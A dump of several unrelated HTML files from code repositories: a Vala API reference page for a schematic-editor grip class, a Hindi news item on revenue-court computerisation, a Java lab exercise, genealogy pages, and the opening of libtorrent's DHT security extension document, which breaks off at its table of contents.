<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
</BODY>
</HTML>
|
docs/dev/Gschem3/Geda3.BoxCornerGrip.html | ehennes775/gschem3 | <!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8"/>
<title>Geda3.BoxCornerGrip – Gschem3 – Vala Binding Reference</title>
<link href="../style.css" rel="stylesheet" type="text/css"/><script src="../scripts.js" type="text/javascript">
</script>
</head>
<body>
<div class="site_header">Geda3.BoxCornerGrip – Gschem3 Reference Manual</div>
<div class="site_body">
<div class="site_navigation">
<ul class="navi_main">
<li class="package_index"><a href="../index.html">Packages</a></li>
</ul>
<hr class="navi_hr"/>
<ul class="navi_main">
<li class="package"><a href="index.htm">Gschem3</a></li>
</ul>
<hr class="navi_hr"/>
<ul class="navi_main">
<li class="namespace"><a href="Geda3.html">Geda3</a></li>
</ul>
<hr class="navi_hr"/>
<ul class="navi_main">
<li class="class">BoxCornerGrip</li>
</ul>
<hr class="navi_hr"/>
<ul class="navi_main">
<li class="creation_method"><a href="Geda3.BoxCornerGrip.BoxCornerGrip.html">BoxCornerGrip</a></li>
<li class="virtual_method"><a href="Geda3.BoxCornerGrip.contacts.html">contacts</a></li>
<li class="virtual_method"><a href="Geda3.BoxCornerGrip.draw.html">draw</a></li>
<li class="virtual_method"><a href="Geda3.BoxCornerGrip.drop.html">drop</a></li>
<li class="virtual_method"><a href="Geda3.BoxCornerGrip.grab.html">grab</a></li>
<li class="virtual_method"><a href="Geda3.BoxCornerGrip.move.html">move</a></li>
</ul>
</div>
<div class="site_content">
<h1 class="main_title">BoxCornerGrip</h1>
<hr class="main_hr"/>
<h2 class="main_title">Object Hierarchy:</h2>
<img class="main_diagram" usemap="#Geda3.BoxCornerGrip" alt="Object hierarchy for BoxCornerGrip" src="img/Geda3.BoxCornerGrip.png"/>
<map id="Geda3.BoxCornerGrip" name="Geda3.BoxCornerGrip">
<area shape="rect" id="node1" href="Geda3.BoxCornerGrip.html" title="Geda3.BoxCornerGrip" alt="" coords="5,197,192,245"/>
<area shape="rect" id="node2" href="Geda3.Grip.html" title="Geda3.Grip" alt="" coords="45,101,152,149"/>
</map>
<h2 class="main_title">Description:</h2>
<div class="main_code_definition"><span class="main_keyword">public</span> <span class="main_keyword">class</span> <b><span class="class">BoxCornerGrip</span></b> : <span class="main_type"><a href="Geda3.Grip.html" class="abstract_class">Grip</a></span>
</div>
<div class="description">
<p>A Grip subclass for manipulating box schematic items</p>
</div><br/>
<div class="namespace_note"><b>Namespace:</b> <a href="Geda3.html">Geda3</a>
</div>
<div class="package_note"><b>Package:</b> <a href="index.htm">Gschem3</a>
</div>
<h2 class="main_title">Content:</h2>
<h3 class="main_title">Creation methods:</h3>
<ul class="navi_inline">
<li class="creation_method"><span class="leaf_code_definition"><span class="main_keyword">public</span> <b><a href="Geda3.BoxCornerGrip.BoxCornerGrip.html" class="creation_method">BoxCornerGrip</a></b> (<span class="main_type"><a href="Geda3.GripAssistant.html" class="interface">GripAssistant</a></span> assistant, <span class="main_type"><a href="Geda3.BoxCornerGripCommon.html" class="class">BoxCornerGripCommon</a></span> common, <span class="main_basic_type"><span class="struct">int</span></span> index_x, <span class="main_basic_type"><span class="struct">int</span></span> index_y)
</span>
<div class="leaf_brief_description"><span class="brief_description">Initialize a new instance</span>
</div></li>
</ul>
<h3 class="main_title">Methods:</h3>
<ul class="navi_inline">
<li class="virtual_method"><span class="leaf_code_definition"><span class="main_keyword">public</span> <span class="main_keyword">override</span> <span class="main_basic_type"><span class="struct">bool</span></span> <b><a href="Geda3.BoxCornerGrip.contacts.html" class="virtual_method">contacts</a></b> (<span class="main_basic_type"><span class="struct">double</span></span> x, <span class="main_basic_type"><span class="struct">double</span></span> y, <span class="main_basic_type"><span class="struct">double</span></span> half_width)
</span>
<div class="leaf_brief_description"><span class="brief_description">Determines if the given point contacts the grip</span>
</div></li>
<li class="virtual_method"><span class="leaf_code_definition"><span class="main_keyword">public</span> <span class="main_keyword">override</span> <span class="main_keyword">void</span> <b><a href="Geda3.BoxCornerGrip.draw.html" class="virtual_method">draw</a></b> (<span class="main_type"><a href="Geda3.SchematicPainter.html" class="abstract_class">SchematicPainter</a></span> painter, <span class="main_basic_type"><span class="struct">double</span></span> half_width)
</span>
<div class="leaf_brief_description"><span class="brief_description">Draw the grip</span>
</div></li>
<li class="virtual_method"><span class="leaf_code_definition"><span class="main_keyword">public</span> <span class="main_keyword">override</span> <span class="main_keyword">void</span> <b><a href="Geda3.BoxCornerGrip.drop.html" class="virtual_method">drop</a></b> (<span class="main_basic_type"><span class="struct">double</span></span> x, <span class="main_basic_type"><span class="struct">double</span></span> y)
</span>
<div class="leaf_brief_description"><span class="brief_description">End dragging the grip</span>
</div></li>
<li class="virtual_method"><span class="leaf_code_definition"><span class="main_keyword">public</span> <span class="main_keyword">override</span> <span class="main_keyword">void</span> <b><a href="Geda3.BoxCornerGrip.grab.html" class="virtual_method">grab</a></b> (<span class="main_basic_type"><span class="struct">double</span></span> x, <span class="main_basic_type"><span class="struct">double</span></span> y)
</span>
<div class="leaf_brief_description"><span class="brief_description">Begin dragging the grip</span>
</div></li>
<li class="virtual_method"><span class="leaf_code_definition"><span class="main_keyword">public</span> <span class="main_keyword">override</span> <span class="main_keyword">void</span> <b><a href="Geda3.BoxCornerGrip.move.html" class="virtual_method">move</a></b> (<span class="main_basic_type"><span class="struct">double</span></span> x, <span class="main_basic_type"><span class="struct">double</span></span> y)
</span>
<div class="leaf_brief_description"><span class="brief_description">Move the grip</span>
</div></li>
</ul>
<h3 class="main_title">Inherited Members:</h3>
<div class="box">
<div class="headline" onclick="toggle_box (this, 'box-content-35')">All known members inherited from class Geda3.Grip</div>
<div class="content" id="box-content-35">
<div class="column">
<ul class="navi_inline">
<li class="abstract_method"><a href="Geda3.Grip.contacts.html">contacts</a></li>
<li class="abstract_method"><a href="Geda3.Grip.draw.html">draw</a></li>
</ul>
</div>
<div class="column">
<ul class="navi_inline">
<li class="abstract_method"><a href="Geda3.Grip.drop.html">drop</a></li>
<li class="abstract_method"><a href="Geda3.Grip.grab.html">grab</a></li>
</ul>
</div>
<div class="column">
<ul class="navi_inline">
<li class="abstract_method"><a href="Geda3.Grip.move.html">move</a></li>
<li class="field"><a href="Geda3.Grip.m_assistant.html">m_assistant</a></li>
</ul>
</div>
</div>
</div>
<div class="box">
<div class="headline" onclick="toggle_box (this, 'box-content-36')">All known members inherited from class GLib.Object</div>
<div class="content" id="box-content-36">
<div class="column">
<ul class="navi_inline">
<li class="static_method">interface_find_property</li>
<li class="static_method">interface_install_property</li>
<li class="static_method">interface_list_properties</li>
<li class="static_method">@new</li>
<li class="static_method">new_valist</li>
<li class="static_method">newv</li>
<li class="static_method">new_with_properties</li>
<li class="method">add_toggle_ref</li>
<li class="method">add_weak_pointer</li>
<li class="method">bind_property</li>
<li class="method">connect</li>
<li class="virtual_method">constructed</li>
<li class="method">disconnect</li>
<li class="virtual_method">dispose</li>
<li class="method">dup_data</li>
<li class="method">dup_qdata</li>
<li class="method">force_floating</li>
</ul>
</div>
<div class="column">
<ul class="navi_inline">
<li class="method">freeze_notify</li>
<li class="method">@get</li>
<li class="method">get_class</li>
<li class="method">get_data</li>
<li class="method">get_property</li>
<li class="method">get_qdata</li>
<li class="method">get_type</li>
<li class="method">getv</li>
<li class="method">is_floating</li>
<li class="method">notify_property</li>
<li class="method">@ref</li>
<li class="method">ref_sink</li>
<li class="method">replace_data</li>
<li class="method">replace_qdata</li>
<li class="method">remove_toggle_ref</li>
<li class="method">remove_weak_pointer</li>
<li class="method">@set</li>
</ul>
</div>
<div class="column">
<ul class="navi_inline">
<li class="method">set_data</li>
<li class="method">set_data_full</li>
<li class="method">set_property</li>
<li class="method">set_qdata</li>
<li class="method">set_qdata_full</li>
<li class="method">set_valist</li>
<li class="method">setv</li>
<li class="method">steal_data</li>
<li class="method">steal_qdata</li>
<li class="method">thaw_notify</li>
<li class="method">unref</li>
<li class="method">watch_closure</li>
<li class="method">weak_ref</li>
<li class="method">weak_unref</li>
<li class="signal">notify</li>
<li class="field">ref_count</li>
</ul>
</div>
</div>
</div>
</div>
</div><br/>
<div class="site_footer">Generated by <a href="https://wiki.gnome.org/Projects/Valadoc"><kbd>valadoc</kbd></a>
</div>
</body>
</html> |
_source/news/20755-lucknow.html | InstantKhabar/_source | ---
title: "मुकदमों की सूचना एस0एम0एस0 से भेजने के लिए पोर्टल की व्यवस्था"
layout: item
category: lucknow
date: 2015-03-25T14:16:21.000Z
image: cc58b8ef56bd7c6c59eca5ef3ba594f8.jpg
---
<p style="text-align: justify;">लखनऊ: राज्य सरकार राजस्व सम्बन्धी मामलों को त्वरित निस्तारण हेतु कृतसंकल्प है। इसी के दृष्टिगत राजस्व परिषद के विशेष प्रयासों से प्रदेश के समस्त 2,189 राजस्व न्यायालयों को कम्प्यूटरीकृत करते हुए वादों की स्थिति को जनसामान्य हेतु इण्टरनेट पर उपलब्ध कराया जा रहा है। यह जानकारी आज यहां एक राज्य सरकार के प्रवक्ता ने दी।</p>
<p style="text-align: justify;">प्रवक्ता ने बताया कि इस प्रणाली का शुभारम्भ अप्रैल, 2013 में किया गया था। वर्तमान में इस प्रणाली पर 37 लाख 41 हजार वाद दर्ज हैं, जिनमें 27 लाख 56 हजार वाद निस्तारित भी किये जा चुके हैं एवं निस्तारण के अन्तिम आदेश भी वेबसाइट पर जनसामान्य के लिए उपलब्ध हैं। </p>
<p style="text-align: justify;">प्रवक्ता के अनुसार वर्ष 2014 में 18 लाख 5 हजार वाद दायर किए गए थे जिसके सापेक्ष 16 लाख 23 हजार वादों को निस्तारित किया गया था। प्रवक्ता ने यह भी बताया कि माह फरवरी, 2015 में 1 लाख 39 हजार 203 वादों के सापेक्ष 1 लाख 37 हजार 219 वादों को निस्तारित किया गया।</p>
<p style="text-align: justify;">प्रवक्ता ने कहा कि तहसील स्तर के न्यायालयों की एकीकृत कम्प्यूटराइज़्ड प्रणाली से वादों के निस्तारण का अनुश्रवण अधिक सुगम एवं सरल हो गया है। उन्होंने बताया कि वादकारियों, अधिवक्ताओं को वादों की स्थिति उपलब्ध कराने तथा न्यायालयों के पेशकार/पीठासीन अधिकारियों को नवीनतम वादों की सूचना एस0एम0एस0 के माध्यम से भेजने के लिए पोर्टल की भी व्यवस्था कर ली गयी है।</p> |
src/lab12/taskjava5662.html | AKryukov92/tasks-for-algorithmisation | <div class="task_block" id="task5662">
<div class="task_id">5662</div>
<h3>Задача</h3>
<h4>Реализуйте метод для решения задачи <a href="[5] лаб. ОСАЛП.html#task5662" target="_blank">ЛР5#5662 (открыть в новой вкладке)</a></h4>
<ol>
<li>В классе Methods реализуйте публичный статический метод task5662.</li>
<li>Он принимает в качестве аргумента 3 действительных числа и возвращает строку.</li>
<li>В теле метода верните результат решения задачи, используя значения аргументов в качестве исходных данных.</li>
</ol>
<h4>Проверьте корректность работы метода с помощью юнит-теста</h4>
<ol start="4">
<li>Убедитесь, что в классе TestSuite импортированы классы "org.junit.Assert" и "org.junit.Test".</li>
<li>В классе TestSuite создайте публичный метод task5662test (далее "юнит-тест"). Пометьте его аннотацией @Test. Сам метод ничего не возвращает и не принимает аргументы.</li>
<li>В теле юнит-теста 5 раз вызовите статический метод task5662 класса Methods. Каждый раз в качестве аргументов нужно передавать значения из разных тестов, описанных в задаче.</li>
<li>Корректность результатов каждого вызова метода task5662 проверьте с помощью статического метода assertEquals класса Assert.</li>
<li>Первый аргумент метода assertEquals это ожидаемое значение. Второй аргумент - результат вызова метода task5662. Третий аргумент (точность) в этом случае не указывается. Она нужна только для проверки действительных чисел.</li>
<li>После запуска юнит-теста, он должен быть отмечен зеленым знаком в списке методов.</li>
</ol>
</div> |
RossFamilyTree/evt/8/b/d15f5fd6c56590ee5e6c5f40cb8.html | RossGammon/the-gammons.net | <!DOCTYPE html>
<html xml:lang="en-GB" lang="en-GB" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-GB">
<title>Ross Gammon’s Family Tree - Events</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="apple-mobile-web-app-capable" content="yes" />
<meta name="generator" content="Gramps 4.2.8 http://gramps-project.org/" />
<meta name="author" content="" />
<link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" />
<link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" />
<link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="header">
<h1 id="SiteTitle">Ross Gammon’s Family Tree</h1>
</div>
<div class="wrapper" id="nav" role="navigation">
<div class="container">
<ul class="menu" id="dropmenu">
<li><a href="../../../individuals.html" title="Individuals">Individuals</a></li>
<li><a href="../../../index.html" title="Surnames">Surnames</a></li>
<li><a href="../../../families.html" title="Families">Families</a></li>
<li class = "CurrentSection"><a href="../../../events.html" title="Events">Events</a></li>
<li><a href="../../../places.html" title="Places">Places</a></li>
<li><a href="../../../sources.html" title="Sources">Sources</a></li>
<li><a href="../../../repositories.html" title="Repositories">Repositories</a></li>
<li><a href="../../../media.html" title="Media">Media</a></li>
<li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li>
</ul>
</div>
</div>
<div class="content" id="EventDetail">
<h3>Death</h3>
<table class="infolist eventlist">
<tbody>
<tr>
<td class="ColumnAttribute">Gramps ID</td>
<td class="ColumnGRAMPSID">E2521</td>
</tr>
<tr>
<td class="ColumnAttribute">Date</td>
<td class="ColumnColumnDate">
1555
</td>
</tr>
</tbody>
</table>
<div class="subsection" id="references">
<h4>References</h4>
<ol class="Col1" role="Volume-n-Page"type = 1>
<li>
<a href="../../../ppl/0/4/d15f5fd6c3c6bce4989be23fe40.html">
CUTCLIFFE, Laurence Of Damage, (Cutlyff), (Cutlyffe) Of Damage, (Cutlyff), (Cutlyffe)
<span class="grampsid"> [I2348]</span>
</a>
</li>
</ol>
</div>
</div>
<div class="fullclear"></div>
<div id="footer">
<p id="createdate">
Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.8<br />Last change was the 2015-08-05 19:54:10<br />Created for <a href="../../../ppl/9/e/d15f5fb48902c4fc1b421d249e9.html">GAMMON, Francis</a>
</p>
<p id="copyright">
</p>
</div>
</body>
</html>
|
RossFamilyTree/ppl/8/b/d15f60399353553f7a4037153b8.html | RossGammon/the-gammons.net | <!DOCTYPE html>
<html xml:lang="en-GB" lang="en-GB" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-GB">
<title>Ross Gammon’s Family Tree - NUNN, Thomas</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="apple-mobile-web-app-capable" content="yes" />
<meta name="generator" content="Gramps 4.2.8 http://gramps-project.org/" />
<meta name="author" content="" />
<link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" />
<link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" />
<link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" />
<link href="../../../css/ancestortree.css" media="screen" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="header">
<h1 id="SiteTitle">Ross Gammon’s Family Tree</h1>
</div>
<div class="wrapper" id="nav" role="navigation">
<div class="container">
<ul class="menu" id="dropmenu">
<li class = "CurrentSection"><a href="../../../individuals.html" title="Individuals">Individuals</a></li>
<li><a href="../../../index.html" title="Surnames">Surnames</a></li>
<li><a href="../../../families.html" title="Families">Families</a></li>
<li><a href="../../../events.html" title="Events">Events</a></li>
<li><a href="../../../places.html" title="Places">Places</a></li>
<li><a href="../../../sources.html" title="Sources">Sources</a></li>
<li><a href="../../../repositories.html" title="Repositories">Repositories</a></li>
<li><a href="../../../media.html" title="Media">Media</a></li>
<li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li>
</ul>
</div>
</div>
<div class="content" id="IndividualDetail">
<h3>NUNN, Thomas<sup><small></small></sup></h3>
<div id="summaryarea">
<table class="infolist">
<tr>
<td class="ColumnAttribute">Birth Name</td>
<td class="ColumnValue">
NUNN, Thomas <a href="#sref1a">1a</a>
</td>
</tr>
<tr>
<td class="ColumnAttribute">Gramps ID</td>
<td class="ColumnValue">I10557</td>
</tr>
<tr>
<td class="ColumnAttribute">Gender</td>
<td class="ColumnValue">male</td>
</tr>
</table>
</div>
<div class="subsection" id="parents">
<h4>Parents</h4>
<table class="infolist">
<thead>
<tr>
<th class="ColumnAttribute">Relation to main person</th>
<th class="ColumnValue">Name</th>
<th class="ColumnValue">Relation within this family (if not by birth)</th>
</tr>
</thead>
<tbody>
</tbody>
<tr>
<td class="ColumnAttribute">Father</td>
<td class="ColumnValue">
<a href="../../../ppl/d/8/d15f603991bad998c9276ad18d.html">NUNN, George<span class="grampsid"> [I10556]</span></a>
</td>
</tr>
<tr>
<td class="ColumnAttribute">Mother</td>
<td class="ColumnValue">
<a href="../../../ppl/2/1/d15f60398d27fa6a34425d6ef12.html">LUCAS, Emma<span class="grampsid"> [I10555]</span></a>
</td>
</tr>
<tr>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue"> <a href="../../../ppl/8/b/d15f60399353553f7a4037153b8.html">NUNN, Thomas<span class="grampsid"> [I10557]</span></a></td>
<td class="ColumnValue"></td>
</tr>
<tr>
<td class="ColumnAttribute"> Sister</td>
<td class="ColumnValue"> <a href="../../../ppl/b/1/d15f60399538c58ad8b0d21b1b.html">NUNN, Emma<span class="grampsid"> [I10558]</span></a></td>
<td class="ColumnValue"></td>
</tr>
<tr>
<td class="ColumnAttribute"> Brother</td>
<td class="ColumnValue"> <a href="../../../ppl/b/d/d15f60399793a56c27b796429db.html">NUNN, George<span class="grampsid"> [I10559]</span></a></td>
<td class="ColumnValue"></td>
</tr>
<tr>
<td class="ColumnAttribute"> Brother</td>
<td class="ColumnValue"> <a href="../../../ppl/1/4/d15f60399a6c3d116abdc25c41.html">NUNN, Robert<span class="grampsid"> [I10560]</span></a></td>
<td class="ColumnValue"></td>
</tr>
<tr>
<td class="ColumnAttribute"> Sister</td>
<td class="ColumnValue"> <a href="../../../ppl/3/2/d15f60399cd22e3a48fe387f623.html">NUNN, Sarah<span class="grampsid"> [I10561]</span></a></td>
<td class="ColumnValue"></td>
</tr>
<tr>
<td class="ColumnAttribute"> Sister</td>
<td class="ColumnValue"> <a href="../../../ppl/0/f/d15f60399f1be3f6dbb3edfbf0.html">NUNN, Elizabeth<span class="grampsid"> [I10562]</span></a></td>
<td class="ColumnValue"></td>
</tr>
<tr>
<td class="ColumnAttribute"> Brother</td>
<td class="ColumnValue"> <a href="../../../ppl/2/c/d15f6039a1575368933cf2aafc2.html">NUNN, David<span class="grampsid"> [I10563]</span></a></td>
<td class="ColumnValue"></td>
</tr>
<tr>
<td class="ColumnAttribute"> Sister</td>
<td class="ColumnValue"> <a href="../../../ppl/e/f/d15f6039a4dee047ae42bfb1fe.html">NUNN, Eliza<span class="grampsid"> [I10564]</span></a></td>
<td class="ColumnValue"></td>
</tr>
<tr>
<td class="ColumnAttribute"> Brother</td>
<td class="ColumnValue"> <a href="../../../ppl/b/6/d15f6039a7e686c8ff5dafa4d6b.html">NUNN, William<span class="grampsid"> [I10565]</span></a></td>
<td class="ColumnValue"></td>
</tr>
<tr>
<td class="ColumnAttribute"> Brother</td>
<td class="ColumnValue"> <a href="../../../ppl/d/0/d15f6039aa870abe7be0919f90d.html">NUNN, Charles<span class="grampsid"> [I10566]</span></a></td>
<td class="ColumnValue"></td>
</tr>
<tr>
<td class="ColumnAttribute"> Sister</td>
<td class="ColumnValue"> <a href="../../../ppl/e/c/d15f6039ad474061f9953243cce.html">NUNN, Mary Ann<span class="grampsid"> [I10567]</span></a></td>
<td class="ColumnValue"></td>
</tr>
<tr>
<td class="ColumnAttribute"> Brother</td>
<td class="ColumnValue"> <a href="../../../ppl/4/e/d15f6039b0b5da042d1477661e4.html">NUNN, James<span class="grampsid"> [I10568]</span></a></td>
<td class="ColumnValue"></td>
</tr>
<tr>
<td class="ColumnAttribute"> Brother</td>
<td class="ColumnValue"> <a href="../../../ppl/0/7/d15f6039b3f45e911ac66cc9470.html">NUNN, Arthur<span class="grampsid"> [I10569]</span></a></td>
<td class="ColumnValue"></td>
</tr>
</table>
</div>
<div class="subsection" id="attributes">
<h4>Attributes</h4>
<table class="infolist attrlist">
<thead>
<tr>
<th class="ColumnType">Type</th>
<th class="ColumnValue">Value</th>
<th class="ColumnNotes">Notes</th>
<th class="ColumnSources">Sources</th>
</tr>
</thead>
<tbody>
<tr>
<td class="ColumnType">_UID</td>
<td class="ColumnValue">084DC4139BB4E14390CF4D4A953348D97E96</td>
<td class="ColumnNotes"><div></div></td>
<td class="ColumnSources"> </td>
</tr>
</tbody>
</table>
</div>
<div class="subsection" id="pedigree">
<h4>Pedigree</h4>
<ol class="pedigreegen">
<li>
<a href="../../../ppl/d/8/d15f603991bad998c9276ad18d.html">NUNN, George<span class="grampsid"> [I10556]</span></a>
<ol>
<li class="spouse">
<a href="../../../ppl/2/1/d15f60398d27fa6a34425d6ef12.html">LUCAS, Emma<span class="grampsid"> [I10555]</span></a>
<ol>
<li class="thisperson">
NUNN, Thomas
</li>
<li>
<a href="../../../ppl/b/1/d15f60399538c58ad8b0d21b1b.html">NUNN, Emma<span class="grampsid"> [I10558]</span></a>
</li>
<li>
<a href="../../../ppl/b/d/d15f60399793a56c27b796429db.html">NUNN, George<span class="grampsid"> [I10559]</span></a>
</li>
<li>
<a href="../../../ppl/1/4/d15f60399a6c3d116abdc25c41.html">NUNN, Robert<span class="grampsid"> [I10560]</span></a>
</li>
<li>
<a href="../../../ppl/3/2/d15f60399cd22e3a48fe387f623.html">NUNN, Sarah<span class="grampsid"> [I10561]</span></a>
</li>
<li>
<a href="../../../ppl/0/f/d15f60399f1be3f6dbb3edfbf0.html">NUNN, Elizabeth<span class="grampsid"> [I10562]</span></a>
</li>
<li>
<a href="../../../ppl/2/c/d15f6039a1575368933cf2aafc2.html">NUNN, David<span class="grampsid"> [I10563]</span></a>
</li>
<li>
<a href="../../../ppl/e/f/d15f6039a4dee047ae42bfb1fe.html">NUNN, Eliza<span class="grampsid"> [I10564]</span></a>
</li>
<li>
<a href="../../../ppl/b/6/d15f6039a7e686c8ff5dafa4d6b.html">NUNN, William<span class="grampsid"> [I10565]</span></a>
</li>
<li>
<a href="../../../ppl/d/0/d15f6039aa870abe7be0919f90d.html">NUNN, Charles<span class="grampsid"> [I10566]</span></a>
</li>
<li>
<a href="../../../ppl/e/c/d15f6039ad474061f9953243cce.html">NUNN, Mary Ann<span class="grampsid"> [I10567]</span></a>
</li>
<li>
<a href="../../../ppl/4/e/d15f6039b0b5da042d1477661e4.html">NUNN, James<span class="grampsid"> [I10568]</span></a>
</li>
<li>
<a href="../../../ppl/0/7/d15f6039b3f45e911ac66cc9470.html">NUNN, Arthur<span class="grampsid"> [I10569]</span></a>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</div>
<div class="subsection" id="tree">
<h4>Ancestors</h4>
<div id="treeContainer" style="width:735px; height:602px;">
<div class="boxbg male AncCol0" style="top: 269px; left: 6px;">
<a class="noThumb" href="../../../ppl/8/b/d15f60399353553f7a4037153b8.html">
NUNN, Thomas
</a>
</div>
<div class="shadow" style="top: 274px; left: 10px;"></div>
<div class="bvline" style="top: 301px; left: 165px; width: 15px"></div>
<div class="gvline" style="top: 306px; left: 165px; width: 20px"></div>
<div class="boxbg male AncCol1" style="top: 119px; left: 196px;">
<a class="noThumb" href="../../../ppl/d/8/d15f603991bad998c9276ad18d.html">
NUNN, George
</a>
</div>
<div class="shadow" style="top: 124px; left: 200px;"></div>
<div class="bvline" style="top: 151px; left: 180px; width: 15px;"></div>
<div class="gvline" style="top: 156px; left: 185px; width: 20px;"></div>
<div class="bhline" style="top: 151px; left: 180px; height: 150px;"></div>
<div class="gvline" style="top: 156px; left: 185px; height: 150px;"></div>
<div class="boxbg female AncCol1" style="top: 419px; left: 196px;">
<a class="noThumb" href="../../../ppl/2/1/d15f60398d27fa6a34425d6ef12.html">
LUCAS, Emma
</a>
</div>
<div class="shadow" style="top: 424px; left: 200px;"></div>
<div class="bvline" style="top: 451px; left: 180px; width: 15px;"></div>
<div class="gvline" style="top: 456px; left: 185px; width: 20px;"></div>
<div class="bhline" style="top: 301px; left: 180px; height: 150px;"></div>
<div class="gvline" style="top: 306px; left: 185px; height: 150px;"></div>
<div class="bvline" style="top: 451px; left: 355px; width: 15px"></div>
<div class="gvline" style="top: 456px; left: 355px; width: 20px"></div>
<div class="boxbg male AncCol2" style="top: 344px; left: 386px;">
<a class="noThumb" href="../../../ppl/8/c/d15f601138077015c440fad6c8.html">
LUCAS, James
</a>
</div>
<div class="shadow" style="top: 349px; left: 390px;"></div>
<div class="bvline" style="top: 376px; left: 370px; width: 15px;"></div>
<div class="gvline" style="top: 381px; left: 375px; width: 20px;"></div>
<div class="bhline" style="top: 376px; left: 370px; height: 75px;"></div>
<div class="gvline" style="top: 381px; left: 375px; height: 75px;"></div>
<div class="bvline" style="top: 376px; left: 545px; width: 15px"></div>
<div class="gvline" style="top: 381px; left: 545px; width: 20px"></div>
<div class="boxbg male AncCol3" style="top: 307px; left: 576px;">
<a class="noThumb" href="../../../ppl/a/3/d15f5fb962f11f46775d411d23a.html">
LUCAS, Nathaniel
</a>
</div>
<div class="shadow" style="top: 312px; left: 580px;"></div>
<div class="bvline" style="top: 339px; left: 560px; width: 15px;"></div>
<div class="gvline" style="top: 344px; left: 565px; width: 20px;"></div>
<div class="bhline" style="top: 339px; left: 560px; height: 37px;"></div>
<div class="gvline" style="top: 344px; left: 565px; height: 37px;"></div>
<div class="boxbg female AncCol3" style="top: 381px; left: 576px;">
<a class="noThumb" href="../../../ppl/6/8/d15f5fb965a7bfcfae4d7c1e486.html">
GASCOYNE, Olivia
</a>
</div>
<div class="shadow" style="top: 386px; left: 580px;"></div>
<div class="bvline" style="top: 413px; left: 560px; width: 15px;"></div>
<div class="gvline" style="top: 418px; left: 565px; width: 20px;"></div>
<div class="bhline" style="top: 376px; left: 560px; height: 37px;"></div>
<div class="gvline" style="top: 381px; left: 565px; height: 37px;"></div>
<div class="boxbg female AncCol2" style="top: 494px; left: 386px;">
<a class="noThumb" href="../../../ppl/4/2/d15f60227291f54af3cc7d3b24.html">
MURRAY, Elizabeth
</a>
</div>
<div class="shadow" style="top: 499px; left: 390px;"></div>
<div class="bvline" style="top: 526px; left: 370px; width: 15px;"></div>
<div class="gvline" style="top: 531px; left: 375px; width: 20px;"></div>
<div class="bhline" style="top: 451px; left: 370px; height: 75px;"></div>
<div class="gvline" style="top: 456px; left: 375px; height: 75px;"></div>
</div>
</div>
<div class="subsection" id="sourcerefs">
<h4>Source References</h4>
<ol>
<li>
<a href="../../../src/e/e/d15f5fe06de45269a4c5f8971ee.html" title="Frank Lee: GEDCOM File : JamesLUCAS.ged" name ="sref1">
Frank Lee: GEDCOM File : JamesLUCAS.ged
<span class="grampsid"> [S0299]</span>
</a>
<ol>
<li id="sref1a">
<ul>
<li>
Confidence: Low
</li>
</ul>
</li>
</ol>
</li>
</ol>
</div>
</div>
<div class="fullclear"></div>
<div id="footer">
<p id="createdate">
Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.8<br />Last change was the 2015-08-05 19:54:50<br />Created for <a href="../../../ppl/9/e/d15f5fb48902c4fc1b421d249e9.html">GAMMON, Francis</a>
</p>
<p id="copyright">
</p>
</div>
</body>
</html>
|
Import/libtorrent/docs/dht_sec.html | franciscocpg/pop | <?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="generator" content="Docutils 0.11: http://docutils.sourceforge.net/" />
<title>BitTorrent DHT security extension</title>
<meta name="author" content="Arvid Norberg, arvid@rasterbar.com" />
<link rel="stylesheet" type="text/css" href="../../css/base.css" />
<link rel="stylesheet" type="text/css" href="../../css/rst.css" />
<script type="text/javascript">
/* <![CDATA[ */
(function() {
var s = document.createElement('script'), t = document.getElementsByTagName('script')[0];
s.type = 'text/javascript';
s.async = true;
s.src = 'http://api.flattr.com/js/0.6/load.js?mode=auto';
t.parentNode.insertBefore(s, t);
})();
/* ]]> */
</script>
<link rel="stylesheet" href="style.css" type="text/css" />
<style type="text/css">
/* Hides from IE-mac \*/
* html pre { height: 1%; }
/* End hide from IE-mac */
</style>
</head>
<body>
<div class="document" id="bittorrent-dht-security-extension">
<div id="container">
<div id="headerNav">
<ul>
<li class="first"><a href="/">Home</a></li>
<li><a href="../../products.html">Products</a></li>
<li><a href="../../contact.html">Contact</a></li>
</ul>
</div>
<div id="header">
<div id="orange"></div>
<div id="logo"></div>
</div>
<div id="main">
<h1 class="title">BitTorrent DHT security extension</h1>
<table class="docinfo" frame="void" rules="none">
<col class="docinfo-name" />
<col class="docinfo-content" />
<tbody valign="top">
<tr><th class="docinfo-name">Author:</th>
<td>Arvid Norberg, <a class="last reference external" href="mailto:arvid@rasterbar.com">arvid@rasterbar.com</a></td></tr>
<tr><th class="docinfo-name">Version:</th>
<td>1.0.0</td></tr>
</tbody>
</table>
<div class="contents topic" id="table-of-contents">
<p class="topic-title first">Table of contents</p>
<ul class="simple">
<li><a class="reference internal" href="#id1" id="id2">BitTorrent DHT security extension</a></li>
<li><a class="reference internal" href="#considerations" id="id3">considerations</a></li>
